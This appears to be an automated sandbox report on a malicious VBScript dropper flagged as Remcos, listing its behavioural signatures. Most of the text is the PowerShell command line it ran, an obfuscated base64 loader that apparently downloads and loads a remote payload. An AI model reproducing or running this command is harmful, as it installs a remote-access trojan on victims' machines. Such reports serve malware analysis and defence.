Analysis Overview
SHA256
e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14
Threat Level: Known bad
The file envifa.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-07 14:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-07 14:39
Reported
2023-12-07 14:41
Platform
win7-20231020-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 2140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2028 wrote to memory of 2140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2028 wrote to memory of 2140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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